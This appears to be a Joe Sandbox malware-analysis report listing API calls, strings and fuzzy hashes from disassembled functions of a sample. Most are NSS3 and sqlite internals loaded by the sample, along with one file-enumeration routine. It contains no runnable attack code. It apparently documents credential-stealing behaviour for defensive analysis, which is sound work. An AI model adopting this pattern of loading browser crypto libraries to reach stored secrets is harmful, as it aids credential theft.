Part of subcall function 6C5DA900: TlsGetValue.KERNEL32(00000000,?,6C7514E4,?,6C574DD9), ref: 6C5DA90F
Part of subcall function 6C5DA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C5DA94F

PR_Unlock.NSS3 ref: 6C606F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C606FA9
TlsGetValue.KERNEL32 ref: 6C6070B4
EnterCriticalSection.KERNEL32(?), ref: 6C6070C8
PR_CallOnce.NSS3(6C7524C0,6C647590), ref: 6C607104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C607117
SECOID_Init.NSS3 ref: 6C607128
PORT_Alloc_Util.NSS3(00000057), ref: 6C60714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C60717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6071A9
PR_NotifyAllCondVar.NSS3 ref: 6C6071CF
PR_Unlock.NSS3 ref: 6C6071DD
free.MOZGLUE(?), ref: 6C6071EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C607208
free.MOZGLUE(00000000), ref: 6C607221
free.MOZGLUE(00000001), ref: 6C607235
TlsGetValue.KERNEL32 ref: 6C60724A
EnterCriticalSection.KERNEL32(?), ref: 6C60725E
PR_NotifyCondVar.NSS3 ref: 6C607273
PR_Unlock.NSS3 ref: 6C607281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C607291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6072B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6072D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6072E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C607372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C740148,,defaultModDB,internalKeySlot), ref: 6C6074CC
free.MOZGLUE(00000000), ref: 6C607513
free.MOZGLUE(00000000), ref: 6C60751B
free.MOZGLUE(00000000), ref: 6C607528
free.MOZGLUE(00000000), ref: 6C60753C
free.MOZGLUE(00000000), ref: 6C607550
free.MOZGLUE(00000000), ref: 6C607561
free.MOZGLUE(00000000), ref: 6C607572
free.MOZGLUE(00000000), ref: 6C607583
free.MOZGLUE(00000000), ref: 6C607594
free.MOZGLUE(00000000), ref: 6C6075A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C6075BD
free.MOZGLUE(00000000), ref: 6C6075C8
free.MOZGLUE(00000000), ref: 6C6075F1
PR_NewLock.NSS3 ref: 6C607636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C607686
PR_NewLock.NSS3 ref: 6C6076A2

Part of subcall function 6C6B98D0: calloc.MOZGLUE(00000001,00000084,6C5E0936,00000001,?,6C5E102C), ref: 6C6B98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C6076B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C607707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C60771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C607731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C60774A
DeleteCriticalSection.KERNEL32(?), ref: 6C607770
free.MOZGLUE(?), ref: 6C607779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C60779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6077AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C6077C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6077DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C607821
PORT_Alloc_Util.NSS3(?), ref: 6C607837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C60785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C60786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C6078AC
free.MOZGLUE(00000000), ref: 6C6078BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C6078F3
free.MOZGLUE(00000000), ref: 6C6078FC
free.MOZGLUE(00000000), ref: 6C60791C

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

Strings

dll, xrefs: 6C60788E
dbm:, xrefs: 6C607716
sql:, xrefs: 6C6076FE
NSS Internal Module, xrefs: 6C6074A2, 6C6074C6
,defaultModDB,internalKeySlot, xrefs: 6C60748D, 6C6074AA
rdb:, xrefs: 6C607744
extern:, xrefs: 6C60772B
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C6074C7
kbi., xrefs: 6C607886
Spac, xrefs: 6C607389

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 70aa81ecef9228571dda8c8639ae6232690136569ee4c9b714c3d67cb81528ae
Instruction ID: fad3cee51210e39482ba1355b7234d57e880896648db787953bef4ac3249dddc
Opcode Fuzzy Hash: 70aa81ecef9228571dda8c8639ae6232690136569ee4c9b714c3d67cb81528ae
Instruction Fuzzy Hash: 7C5213B1F002059BEF159F64CE09BAE7BB4BF06348F144138ED09B6A41EB71D958CB99

Function 6C654840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C63601B,?,00000000,?), ref: 6C65486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C6548A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C6548BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C6548DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C6548F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C65490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C654919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C65493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654970
PORT_Alloc_Util.NSS3(00000001), ref: 6C6549A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6549AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6549D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C6549F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C654A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C654A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C654A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C654A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C654A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C654A81
free.MOZGLUE(00000000), ref: 6C654AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C654ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C654ADC
free.MOZGLUE(00000000), ref: 6C654B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C654B33

Part of subcall function 6C654120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65413D
Part of subcall function 6C654120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C654162
Part of subcall function 6C654120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65416B
Part of subcall function 6C654120: PL_strncasecmp.NSS3(2Bel,?,00000001), ref: 6C654187
Part of subcall function 6C654120: NSSUTIL_ArgSkipParameter.NSS3(2Bel), ref: 6C6541A0
Part of subcall function 6C654120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6541B4
Part of subcall function 6C654120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C6541CC
Part of subcall function 6C654120: NSSUTIL_ArgFetchValue.NSS3(2Bel,?), ref: 6C654203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C654B53
free.MOZGLUE(00000000), ref: 6C654B94
free.MOZGLUE(?), ref: 6C654BA7
free.MOZGLUE(00000000), ref: 6C654BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654BC8

Strings

rootFlags, xrefs: 6C654AB9, 6C654B2E
hasRootCerts, xrefs: 6C654AD6
slotFlags, xrefs: 6C654A22
timeout, xrefs: 6C654A38, 6C654A7B
every, xrefs: 6C654A66
hasRootTrust, xrefs: 6C654B4D
askpw, xrefs: 6C654A4A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: bef9c77d0404c054f0543e4e9fcaf4097e915d8bf419bf45125a713859232d2e
Instruction ID: 10578fa836d3ca8fd53dbbaaa4edb63b9ef0cfc46bf0b96da7035a522491ecff
Opcode Fuzzy Hash: bef9c77d0404c054f0543e4e9fcaf4097e915d8bf419bf45125a713859232d2e
Instruction Fuzzy Hash: FAC117B4E052565BEB009F689C41BFE7BB8AF0630CF6800A5EC55A7701E7B1D934C7A9

Function 6C616D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C71A8EC,0000006C), ref: 6C616DC6
memcpy.VCRUNTIME140(?,6C71A958,0000006C), ref: 6C616DDB
memcpy.VCRUNTIME140(?,6C71A9C4,00000078), ref: 6C616DF1
memcpy.VCRUNTIME140(?,6C71AA3C,0000006C), ref: 6C616E06
memcpy.VCRUNTIME140(?,6C71AAA8,00000060), ref: 6C616E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C616E38

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C616E76
TlsGetValue.KERNEL32 ref: 6C61726F
EnterCriticalSection.KERNEL32(?), ref: 6C617283

Strings

!, xrefs: 6C617123

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: ce64ac12ad5defe7790b5363665fd5126159e3693e83ad3223d1cda571fd66d3
Instruction ID: d684a6d1d05fe68742636257f9fccae0accf84322ed4c2c9e8387ce52b87b032
Opcode Fuzzy Hash: ce64ac12ad5defe7790b5363665fd5126159e3693e83ad3223d1cda571fd66d3
Instruction Fuzzy Hash: 8C729DB5D092189FDB20DF28CC8879ABBB1EF49305F1441E9D80CA7711EB31AA85CF95

Function 00EF2630 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00EF2649
FindFirstFileA.KERNEL32(?,?), ref: 00EF2660
lstrcat.KERNEL32(?,?), ref: 00EF26B2
StrCmpCA.SHLWAPI(?,00EFE858), ref: 00EF26C4
StrCmpCA.SHLWAPI(?,00EFE85C), ref: 00EF26DA
FindNextFileA.KERNEL32(000000FF,?), ref: 00EF2960
FindClose.KERNEL32(000000FF), ref: 00EF2975

Strings

%s\%s, xrefs: 00EF27DD
%s\%s\%s, xrefs: 00EF27BB
%s\%s, xrefs: 00EF26F4
%s%s, xrefs: 00EF2818
%s\*, xrefs: 00EF263D

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 830c9313a0598409177d264ac47b31e6d345cfa1150a6182e0cc76e3227b16e9
Instruction ID: 970a049e47aca0c4c312f090f17a06143623100e5baa5b7763e0d1991e9d819b
Opcode Fuzzy Hash: 830c9313a0598409177d264ac47b31e6d345cfa1150a6182e0cc76e3227b16e9
Instruction Fuzzy Hash: B191657190021C9BDB25EBA0DC85EFE73B9BB54301F04459CF71AA6185EBB49B84CF61

Function 6C598460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C5984FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C5988BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C5988CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5988E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C5988F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C59894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C59895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C598914

Part of subcall function 6C5831C0: sqlite3_initialize.NSS3 ref: 6C5831D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C598A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C598A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C598A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C598B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C598B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C598BAD

Strings

cannot limit WAL size: %s, xrefs: 6C599188

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: 4c8bcf08aac4bbc017460b22f7f6f0f4eea31d21398341a15d4004dcf027faba
Instruction ID: bf35571420ceabf14b047bf811da83608f3c1072c840fada37a1c98b6820d926
Opcode Fuzzy Hash: 4c8bcf08aac4bbc017460b22f7f6f0f4eea31d21398341a15d4004dcf027faba
Instruction Fuzzy Hash: 5E929D71A083419FD704CF29CC84A5AB7F1FF88318F188A6DE99987761E731E855CB92

Function 6C65AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C65ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C65ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C65ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C65AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C65ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65ADF0

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C65B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C65B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C65B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C65B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C65B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65B40C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 11e48f0a0aacb4804518124917e8fc559c56c1b1799760a2ddc921e0f78131d6
Instruction ID: fcea5f3f4c395e5b1227ddbb77ff86b004b57616d31215dcf0a90d8c815eb4d1
Opcode Fuzzy Hash: 11e48f0a0aacb4804518124917e8fc559c56c1b1799760a2ddc921e0f78131d6
Instruction Fuzzy Hash: CE22CF71904301AFE710CF14CC41BAA77E1AF8530CF64852CE9595B7A2E772E869CB9E

Function 6C5E4420 Relevance: 37.9, APIs: 10, Strings: 11, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5E4EE3

Strings

a generated column, xrefs: 6C5E4D58, 6C5E4E8B
weekday , xrefs: 6C5E54AB
-, xrefs: 6C5E4FBA
40f-21a-21d, xrefs: 6C5E44D0
non-deterministic use of %s() in %s, xrefs: 6C5E4D71, 6C5E4EA4
w=^l, xrefs: 6C5E4431, 6C5E4E25, 6C5E533D, 6C5E5536, 6C5E55A0, 6C5E4A83, 6C5E4A99, 6C5E5313, 6C5E5325, 6C5E4CFC, 6C5E4A8C, 6C5E51AC, 6C5E48B9, 6C5E46CD, 6C5E4786, 6C5E48D5, 6C5E490D, 6C5E5404, 6C5E5411, 6C5E541E, 6C5E5365, 6C5E537B, 6C5E536E, 6C5E542A, 6C5E5466, 6C5E53C9, 6C5E5211, 6C5E4BA1, 6C5E5013, 6C5E521D, 6C5E4C69, 6C5E528B, 6C5E4691, 6C5E5058, 6C5E4E5E, 6C5E4FA4, 6C5E4FEB, 6C5E4FDF, 6C5E4F9D, 6C5E4E77, 6C5E4EDF, 6C5E4576, 6C5E4F90
a CHECK constraint, xrefs: 6C5E4D62, 6C5E4D6D, 6C5E4E95, 6C5E4EA0
start of , xrefs: 6C5E517A
second, xrefs: 6C5E4BCA
an index, xrefs: 6C5E4D53, 6C5E4E86
w=^l, xrefs: 6C5E47FB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $w=^l$w=^l$weekday
API String ID: 39653677-583062005
Opcode ID: 9f940d273df9d73095bdc0c01e03c1106fcb40d7f57a9725ba5b3602c2b420d6
Instruction ID: b5317459c1623476a24c90d0d83c652acb8b512070129d5b5e751010af9e19f2
Opcode Fuzzy Hash: 9f940d273df9d73095bdc0c01e03c1106fcb40d7f57a9725ba5b3602c2b420d6
Instruction Fuzzy Hash: 44A267716087848FC711CF34C8507AAB7E2AF8E318F548A5DE8D99BB42E735D886C746

Function 6C5DECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C5DED38

Part of subcall function 6C574F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C574FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C5DEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C5DEFE4

Part of subcall function 6C69DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C575001,?,00000003,00000000), ref: 6C69DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C5DF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C5DF129
sqlite3_mprintf.NSS3(optimize), ref: 6C5DF1D1
sqlite3_free.NSS3(?), ref: 6C5DF368

Strings

fts4aux, xrefs: 6C5DECF9
matchinfo, xrefs: 6C5DF04F, 6C5DF082, 6C5DF0C2, 6C5DF0F2, 6C5DF124, 6C5DF169
optimize, xrefs: 6C5DF199, 6C5DF1CC, 6C5DF211
unicode61, xrefs: 6C5DEDB5
fts3tokenize, xrefs: 6C5DF30F
offsets, xrefs: 6C5DEFAF, 6C5DEFDF, 6C5DF01F
simple, xrefs: 6C5DED79
porter, xrefs: 6C5DED97
fts3_tokenizer, xrefs: 6C5DEE1A, 6C5DEEA8
snippet, xrefs: 6C5DEF05, 6C5DEF37, 6C5DEF7C
fts3, xrefs: 6C5DF247
fts4, xrefs: 6C5DF2AD

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
